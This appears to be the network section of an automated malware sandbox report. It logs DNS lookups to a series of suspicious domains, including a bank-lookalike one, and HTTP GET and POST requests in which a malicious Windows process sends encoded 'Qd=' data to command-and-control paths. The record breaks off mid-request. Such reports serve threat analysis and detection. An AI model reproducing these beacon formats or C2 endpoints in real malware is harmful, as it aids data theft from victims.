                        Sep 3, 2024 10:43:31.222335100 CEST53625821.1.1.1192.168.2.4
                        Sep 3, 2024 10:43:32.159452915 CEST5358537162.159.36.2192.168.2.4
                        Sep 3, 2024 10:43:32.626281977 CEST6431953192.168.2.41.1.1.1
                        Sep 3, 2024 10:43:32.633683920 CEST53643191.1.1.1192.168.2.4
                        Sep 3, 2024 10:43:46.766138077 CEST5011853192.168.2.41.1.1.1
                        Sep 3, 2024 10:43:46.864938021 CEST53501181.1.1.1192.168.2.4
                        Sep 3, 2024 10:44:00.078264952 CEST5070053192.168.2.41.1.1.1
                        Sep 3, 2024 10:44:00.842576981 CEST53507001.1.1.1192.168.2.4
                        Sep 3, 2024 10:44:14.437024117 CEST6297553192.168.2.41.1.1.1
                        Sep 3, 2024 10:44:27.921328068 CEST4925753192.168.2.41.1.1.1
                        Sep 3, 2024 10:44:27.937509060 CEST53492571.1.1.1192.168.2.4
                        Sep 3, 2024 10:44:41.375121117 CEST5678053192.168.2.41.1.1.1
                        Sep 3, 2024 10:44:41.453557014 CEST53567801.1.1.1192.168.2.4
                        Sep 3, 2024 10:44:54.750368118 CEST6069053192.168.2.41.1.1.1
                        Sep 3, 2024 10:44:54.763676882 CEST53606901.1.1.1192.168.2.4
                        Sep 3, 2024 10:45:02.830327034 CEST6468153192.168.2.41.1.1.1
                        Sep 3, 2024 10:45:02.949520111 CEST53646811.1.1.1192.168.2.4
                        Sep 3, 2024 10:45:25.411379099 CEST5173253192.168.2.41.1.1.1
                        Sep 3, 2024 10:45:25.914899111 CEST53517321.1.1.1192.168.2.4
                        Sep 3, 2024 10:45:33.969957113 CEST6162953192.168.2.41.1.1.1
                        Sep 3, 2024 10:45:33.995318890 CEST53616291.1.1.1192.168.2.4
                        Sep 3, 2024 10:45:47.281409025 CEST5077353192.168.2.41.1.1.1
                        Sep 3, 2024 10:45:47.298784971 CEST53507731.1.1.1192.168.2.4
                        Sep 3, 2024 10:46:00.409715891 CEST6237853192.168.2.41.1.1.1
                        Sep 3, 2024 10:46:01.257359982 CEST53623781.1.1.1192.168.2.4
                        Sep 3, 2024 10:46:14.892458916 CEST6331753192.168.2.41.1.1.1
                        Sep 3, 2024 10:46:15.581470013 CEST53633171.1.1.1192.168.2.4
                        Sep 3, 2024 10:46:29.094446898 CEST4990753192.168.2.41.1.1.1
                        Sep 3, 2024 10:46:29.103595018 CEST53499071.1.1.1192.168.2.4
                        Sep 3, 2024 10:46:37.158464909 CEST5375653192.168.2.41.1.1.1
                        Sep 3, 2024 10:46:37.257754087 CEST53537561.1.1.1192.168.2.4
                        Sep 3, 2024 10:46:50.594384909 CEST4982353192.168.2.41.1.1.1
                        Sep 3, 2024 10:46:50.742693901 CEST53498231.1.1.1192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Sep 3, 2024 10:43:30.682430029 CEST192.168.2.41.1.1.10x22a1Standard query (0)www.clientebradesco.onlineA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:43:32.626281977 CEST192.168.2.41.1.1.10x428bStandard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                        Sep 3, 2024 10:43:46.766138077 CEST192.168.2.41.1.1.10x8871Standard query (0)www.myim.cloudA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:44:00.078264952 CEST192.168.2.41.1.1.10xf2eStandard query (0)www.d55dg.topA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:44:14.437024117 CEST192.168.2.41.1.1.10x3248Standard query (0)www.arlon-commerce.comA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:44:27.921328068 CEST192.168.2.41.1.1.10x1ed7Standard query (0)www.fineg.onlineA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:44:41.375121117 CEST192.168.2.41.1.1.10x7591Standard query (0)www.asian-massage-us.xyzA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:44:54.750368118 CEST192.168.2.41.1.1.10xb148Standard query (0)www.thriveline.onlineA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:45:02.830327034 CEST192.168.2.41.1.1.10x3c67Standard query (0)www.aflaksokna.comA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:45:25.411379099 CEST192.168.2.41.1.1.10x5454Standard query (0)www.esistiliya.onlineA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:45:33.969957113 CEST192.168.2.41.1.1.10xdb89Standard query (0)www.qiluqiyuan.buzzA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:45:47.281409025 CEST192.168.2.41.1.1.10x2b40Standard query (0)www.omexai.infoA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:46:00.409715891 CEST192.168.2.41.1.1.10x6937Standard query (0)www.dfbio.netA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:46:14.892458916 CEST192.168.2.41.1.1.10x2f69Standard query (0)www.healthsolutions.topA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:46:29.094446898 CEST192.168.2.41.1.1.10xfa71Standard query (0)www.950021.comA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:46:37.158464909 CEST192.168.2.41.1.1.10xc4cStandard query (0)www.golbasi-nakliyat.xyzA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:46:50.594384909 CEST192.168.2.41.1.1.10xb7beStandard query (0)www.begumnasreenbano.comA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Sep 3, 2024 10:43:31.222335100 CEST1.1.1.1192.168.2.40x22a1No error (0)www.clientebradesco.online198.58.118.167A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:43:31.222335100 CEST1.1.1.1192.168.2.40x22a1No error (0)www.clientebradesco.online45.33.23.183A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:43:31.222335100 CEST1.1.1.1192.168.2.40x22a1No error (0)www.clientebradesco.online96.126.123.244A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:43:31.222335100 CEST1.1.1.1192.168.2.40x22a1No error (0)www.clientebradesco.online45.79.19.196A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:43:31.222335100 CEST1.1.1.1192.168.2.40x22a1No error (0)www.clientebradesco.online45.33.30.197A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:43:31.222335100 CEST1.1.1.1192.168.2.40x22a1No error (0)www.clientebradesco.online72.14.185.43A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:43:31.222335100 CEST1.1.1.1192.168.2.40x22a1No error (0)www.clientebradesco.online45.33.2.79A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:43:31.222335100 CEST1.1.1.1192.168.2.40x22a1No error (0)www.clientebradesco.online45.56.79.23A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:43:31.222335100 CEST1.1.1.1192.168.2.40x22a1No error (0)www.clientebradesco.online45.33.20.235A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:43:31.222335100 CEST1.1.1.1192.168.2.40x22a1No error (0)www.clientebradesco.online45.33.18.44A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:43:31.222335100 CEST1.1.1.1192.168.2.40x22a1No error (0)www.clientebradesco.online173.255.194.134A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:43:31.222335100 CEST1.1.1.1192.168.2.40x22a1No error (0)www.clientebradesco.online72.14.178.174A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:43:32.633683920 CEST1.1.1.1192.168.2.40x428bName error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                        Sep 3, 2024 10:43:46.864938021 CEST1.1.1.1192.168.2.40x8871No error (0)www.myim.cloud199.59.243.226A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:44:00.842576981 CEST1.1.1.1192.168.2.40xf2eNo error (0)www.d55dg.topd55dg.topCNAME (Canonical name)IN (0x0001)false
                        Sep 3, 2024 10:44:00.842576981 CEST1.1.1.1192.168.2.40xf2eNo error (0)d55dg.top154.23.184.240A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:44:14.522980928 CEST1.1.1.1192.168.2.40x3248No error (0)www.arlon-commerce.comwhois-unverified.domainbox.akadns.netCNAME (Canonical name)IN (0x0001)false
                        Sep 3, 2024 10:44:27.937509060 CEST1.1.1.1192.168.2.40x1ed7No error (0)www.fineg.online162.0.239.141A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:44:41.453557014 CEST1.1.1.1192.168.2.40x7591No error (0)www.asian-massage-us.xyz199.59.243.226A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:44:54.763676882 CEST1.1.1.1192.168.2.40xb148Server failure (2)www.thriveline.onlinenonenoneA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:45:02.949520111 CEST1.1.1.1192.168.2.40x3c67No error (0)www.aflaksokna.comaflaksokna.comCNAME (Canonical name)IN (0x0001)false
                        Sep 3, 2024 10:45:02.949520111 CEST1.1.1.1192.168.2.40x3c67No error (0)aflaksokna.com5.144.130.52A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:45:25.914899111 CEST1.1.1.1192.168.2.40x5454Name error (3)www.esistiliya.onlinenonenoneA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:45:33.995318890 CEST1.1.1.1192.168.2.40xdb89No error (0)www.qiluqiyuan.buzz161.97.168.245A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:45:47.298784971 CEST1.1.1.1192.168.2.40x2b40No error (0)www.omexai.infoomexai.infoCNAME (Canonical name)IN (0x0001)false
                        Sep 3, 2024 10:45:47.298784971 CEST1.1.1.1192.168.2.40x2b40No error (0)omexai.info3.33.130.190A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:45:47.298784971 CEST1.1.1.1192.168.2.40x2b40No error (0)omexai.info15.197.148.33A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:46:01.257359982 CEST1.1.1.1192.168.2.40x6937No error (0)www.dfbio.net218.247.68.184A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:46:15.581470013 CEST1.1.1.1192.168.2.40x2f69No error (0)www.healthsolutions.top13.248.169.48A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:46:15.581470013 CEST1.1.1.1192.168.2.40x2f69No error (0)www.healthsolutions.top76.223.54.146A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:46:29.103595018 CEST1.1.1.1192.168.2.40xfa71Name error (3)www.950021.comnonenoneA (IP address)IN (0x0001)false
                        Sep 3, 2024 10:46:37.257754087 CEST1.1.1.1192.168.2.40xc4cNo error (0)www.golbasi-nakliyat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                        Sep 3, 2024 10:46:37.257754087 CEST1.1.1.1192.168.2.40xc4cNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                        Sep 3, 2024 10:46:37.257754087 CEST1.1.1.1192.168.2.40xc4cNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:46:50.742693901 CEST1.1.1.1192.168.2.40xb7beNo error (0)www.begumnasreenbano.com188.114.97.3A (IP address)IN (0x0001)false
                        Sep 3, 2024 10:46:50.742693901 CEST1.1.1.1192.168.2.40xb7beNo error (0)www.begumnasreenbano.com188.114.96.3A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • www.clientebradesco.online
                        • www.myim.cloud
                        • www.d55dg.top
                        • www.fineg.online
                        • www.asian-massage-us.xyz
                        • www.aflaksokna.com
                        • www.qiluqiyuan.buzz
                        • www.omexai.info
                        • www.dfbio.net
                        • www.healthsolutions.top
                        • www.golbasi-nakliyat.xyz
                        • www.begumnasreenbano.com

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449736198.58.118.167804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:43:31.240164042 CEST452OUTGET /xsf1/?0z=mDcdcR8&Qd=/2dxOCr9e8Tu47VrDtpSeX10nPtSg3pDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaFTseamB50Z39E1GsXK0bz9SU84PyWrGtEeg= HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.clientebradesco.online
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:43:31.725141048 CEST1236INHTTP/1.1 200 OK
                        server: openresty/1.13.6.1
                        date: Tue, 03 Sep 2024 08:43:31 GMT
                        content-type: text/html
                        transfer-encoding: chunked
                        connection: close
                        Data Raw: 34 37 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 6c 69 65 6e 74 65 [TRUNCATED]
                        Data Ascii: 471<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.clientebradesco.online/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.clientebradesco.online/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725353011.0046901200&other_args=eyJ1cmkiOiAiL3hzZjEiLCAiYXJncyI6ICIwej1tRGNkY1I4JlFkPS8yZHhPQ3I5ZThUdTQ3VnJEdHBTZVgxMG5QdFNnM3BEdEpFdDNjMkZvejVmcHplb1JJdWpCVmpyRE1zS0hjNzArMEs5aVZLQTd2RTlaRkNpTTVPYUZUc2VhbUI1MFozOUUxR3NYSzBiejlTVTg0UHlXckd0RWVnPSIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3ht [TRUNCATED]
                        Sep 3, 2024 10:43:31.725155115 CEST69INData Raw: 50 54 41 75 4f 43 4a 39 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: PTAuOCJ9"; } </script> </body></html>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.464975199.59.243.226804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:43:46.882070065 CEST706OUTPOST /12ts/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.myim.cloud
                        Origin: http://www.myim.cloud
                        Referer: http://www.myim.cloud/12ts/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 62 51 39 67 56 68 57 45 54 6a 2f 44 65 48 31 73 63 6e 64 34 69 4d 45 48 7a 73 4e 64 52 65 38 6a 46 7a 55 46 42 2f 77 55 5a 57 38 52 6a 6f 30 38 38 55 68 34 36 30 4b 67 73 32 39 38 68 39 67 6f 7a 43 73 65 69 32 4f 6b 42 5a 5a 71 69 71 6f 49 48 71 65 69 77 77 6e 31 6f 44 46 51 35 51 70 70 4c 4b 67 42 66 64 42 32 64 78 51 68 7a 44 56 6f 36 31 6b 56 42 68 76 32 71 56 52 65 67 4e 6a 6b 66 36 4e 58 4f 2f 6c 56 37 69 6b 6d 62 4f 55 4d 52 74 39 2f 51 51 2f 65 32 4f 75 31 73 71 4c 34 32 73 44 31 4d 4c 79 72 68 61 32 44 70 76 78 6f 4f 44 46 5a 32 51 3d 3d
                        Data Ascii: Qd=SIczoioFeEyVbQ9gVhWETj/DeH1scnd4iMEHzsNdRe8jFzUFB/wUZW8Rjo088Uh460Kgs298h9gozCsei2OkBZZqiqoIHqeiwwn1oDFQ5QppLKgBfdB2dxQhzDVo61kVBhv2qVRegNjkf6NXO/lV7ikmbOUMRt9/QQ/e2Ou1sqL42sD1MLyrha2DpvxoODFZ2Q==
                        Sep 3, 2024 10:43:47.542840004 CEST1236INHTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:43:46 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1106
                        x-request-id: cad67dea-fdeb-4d9c-b7b5-fac8dac9a5f5
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==
                        set-cookie: parking_session=cad67dea-fdeb-4d9c-b7b5-fac8dac9a5f5; expires=Tue, 03 Sep 2024 08:58:47 GMT; path=/
                        connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 69 74 4a 35 77 54 74 63 61 39 34 30 50 45 46 62 77 36 4f 45 57 36 54 4b 30 67 64 35 53 53 6d 31 64 6e 76 33 75 39 64 47 42 38 5a 34 61 5a 6f 66 79 7a 79 77 69 46 46 30 58 74 46 56 4f 31 58 66 54 65 39 42 44 78 6e 6f 66 56 6c 53 47 55 34 65 43 4d 63 45 6b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                        Sep 3, 2024 10:43:47.542860031 CEST559INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2FkNjdkZWEtZmRlYi00ZDljLWI3YjUtZmFjOGRhYzlhNWY1IiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.464976199.59.243.226804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:43:49.426989079 CEST726OUTPOST /12ts/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.myim.cloud
                        Origin: http://www.myim.cloud
                        Referer: http://www.myim.cloud/12ts/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 4a 41 4e 67 58 43 4f 45 55 44 2f 45 43 58 31 73 56 48 64 38 69 4d 49 48 7a 74 35 4e 52 74 59 6a 45 57 6f 46 41 36 63 55 55 32 38 52 37 34 30 44 32 30 68 7a 36 30 48 66 73 30 35 38 68 2b 63 6f 7a 48 6f 65 69 6e 4f 6a 42 4a 5a 6b 70 4b 6f 4b 4a 4b 65 69 77 77 6e 31 6f 44 68 32 35 51 78 70 49 35 34 42 4e 73 42 31 63 78 51 69 30 44 56 6f 77 56 6b 52 42 68 76 49 71 51 4a 77 67 50 62 6b 66 37 39 58 4f 4f 6c 53 79 69 6b 6f 52 75 56 67 55 64 6c 36 56 79 61 66 78 74 4f 6d 69 4a 72 64 7a 71 53 76 64 36 54 38 7a 61 53 77 30 6f 34 63 44 41 34 51 74 55 6c 66 66 34 58 77 59 6f 44 6c 37 32 70 54 62 31 6c 4d 54 45 59 3d
                        Data Ascii: Qd=SIczoioFeEyVJANgXCOEUD/ECX1sVHd8iMIHzt5NRtYjEWoFA6cUU28R740D20hz60Hfs058h+cozHoeinOjBJZkpKoKJKeiwwn1oDh25QxpI54BNsB1cxQi0DVowVkRBhvIqQJwgPbkf79XOOlSyikoRuVgUdl6VyafxtOmiJrdzqSvd6T8zaSw0o4cDA4QtUlff4XwYoDl72pTb1lMTEY=
                        Sep 3, 2024 10:43:49.860321045 CEST1236INHTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:43:49 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1106
                        x-request-id: 32545aa2-ff8b-4bfa-a24a-2a2421b880d4
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==
                        set-cookie: parking_session=32545aa2-ff8b-4bfa-a24a-2a2421b880d4; expires=Tue, 03 Sep 2024 08:58:49 GMT; path=/
                        connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 69 74 4a 35 77 54 74 63 61 39 34 30 50 45 46 62 77 36 4f 45 57 36 54 4b 30 67 64 35 53 53 6d 31 64 6e 76 33 75 39 64 47 42 38 5a 34 61 5a 6f 66 79 7a 79 77 69 46 46 30 58 74 46 56 4f 31 58 66 54 65 39 42 44 78 6e 6f 66 56 6c 53 47 55 34 65 43 4d 63 45 6b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                        Sep 3, 2024 10:43:49.860337019 CEST559INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzI1NDVhYTItZmY4Yi00YmZhLWEyNGEtMmEyNDIxYjg4MGQ0IiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.464977199.59.243.226804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:43:52.104077101 CEST10808OUTPOST /12ts/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.myim.cloud
                        Origin: http://www.myim.cloud
                        Referer: http://www.myim.cloud/12ts/
